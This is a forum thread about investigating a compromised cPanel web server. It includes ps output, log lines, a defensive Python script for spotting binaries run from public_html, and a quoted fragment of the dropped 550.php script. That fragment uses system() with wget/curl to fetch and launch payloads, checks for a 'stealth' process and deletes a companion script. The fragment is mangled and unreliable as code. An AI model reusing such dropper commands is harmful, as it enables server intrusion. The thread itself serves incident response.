Strange programs running server
Folks,
How do I determine what these strange programs have been doing on my server?
root 9771 0.0 0.0 20164 1164 ? Ss Mar22 0:00 jailshell (username) [9817] l -c /home/username/public_html/Linux_amd64 > /dev/null 2>&1
username 9817 0.0 0.0 20164 268 ? S Mar22 0:42 jailshell (username) [init] l -c /home/jimhermann/public_html/Linux_amd64 > /dev/null 2>&1
They were saved to the hard drive by the 550.php script. I ran chmod 000 after I found them.
----------. 1 username username 2228748 Mar 16 05:11 Linux_x86
----------. 1 username username 2377240 Mar 16 05:11 Linux_amd64
----------. 1 username username 453 Mar 22 08:49 550.php
It looks like files 412.php and 550.php were uploaded first before March, then 550.php was executed via http on March 22.
# more 550.php
" 2>/dev/null || curl -O "&1 &');
system('ps aux|stealth');
system('wget "/dev/null || curl -O "&1 &');
system('ps aux|grep stealth');
system('rm -rf 412.php');
?>
# grep 93.41.203.52 username.com-ssl_log-Mar-2022
93.41.203.52 - - [22/Mar/2022:09:25:57 -0500] "GET /550.php HTTP/1.1" 200 250 "-" "curl/7.52.1"
Imunify AV+ reported that the Linux_amd64 file was infected with SMW-BLKH-1421002-elf.troj
Thanks,
Jim
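As an added example (not part of the thread or of cPanel), here is a small Python script that automates the two checks Jim did by hand: scanning `ps aux` output for processes whose command line executes something under a public_html directory, and pulling the access-log requests that hit the dropped PHP scripts so the upload can be tied to the request that triggered it. The sample ps and log lines are constructed to mirror the post; the client IP 198.51.100.7 is a documentation address, not the one in the thread.

```python
import re

# Constructed sample data modelled on the thread (not the poster's real output).
PS_AUX = """\
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 168000 9000 ? Ss Mar01 0:03 /sbin/init
username 9817 0.0 0.0 20164 268 ? S Mar22 0:42 jailshell (username) [init] l -c /home/username/public_html/Linux_amd64 > /dev/null 2>&1
username 10234 0.0 0.2 250000 30000 ? S Mar22 0:01 php-fpm: pool username
"""
ACCESS_LOG = """\
198.51.100.7 - - [22/Mar/2022:09:25:57 -0500] "GET /550.php HTTP/1.1" 200 250 "-" "curl/7.52.1"
198.51.100.7 - - [22/Mar/2022:09:26:01 -0500] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# A binary launched from a web-writable document root is the red flag here.
WEB_DIR = re.compile(r"/home/[^/\s]+/public_html/\S+")
# Apache/cPanel combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')


def suspicious_processes(ps_output):
    """Return (user, pid, binary) for every process whose command line runs
    something from a public_html directory."""
    hits = []
    for line in ps_output.splitlines()[1:]:      # skip the header row
        fields = line.split(None, 10)            # COMMAND may contain spaces
        if len(fields) < 11:
            continue
        match = WEB_DIR.search(fields[10])
        if match:
            hits.append((fields[0], int(fields[1]), match.group(0)))
    return hits


def script_requests(log_text, script_names):
    """Return each request whose path ends in one of the dropped script names,
    flagging command-line clients (curl/wget) that a browser visit would not show."""
    found = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and m.group("path").rsplit("/", 1)[-1] in script_names:
            rec = m.groupdict()
            rec["cli_client"] = rec["ua"].startswith(("curl", "wget", "Wget"))
            found.append(rec)
    return found


if __name__ == "__main__":
    for hit in suspicious_processes(PS_AUX):
        print("process from web dir:", hit)
    for req in script_requests(ACCESS_LOG, {"412.php", "550.php"}):
        print("request:", req["ip"], req["ts"], req["path"], req["status"], req["ua"])
```

Run it against the real `ps aux` output and the domain's access log instead of the embedded samples; a process hit plus a matching request gives the execution time and source address to start the timeline from.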
Hey there! The good news is that the compromise only appears to be at the user level, as the files were owned by the cPanel user and not root. If you do a search for "Linux_amd64 malware" you'll see many references to that tool, mostly about trying to capture network traffic to get sensitive data.
yeah, these accounts got hacked. :)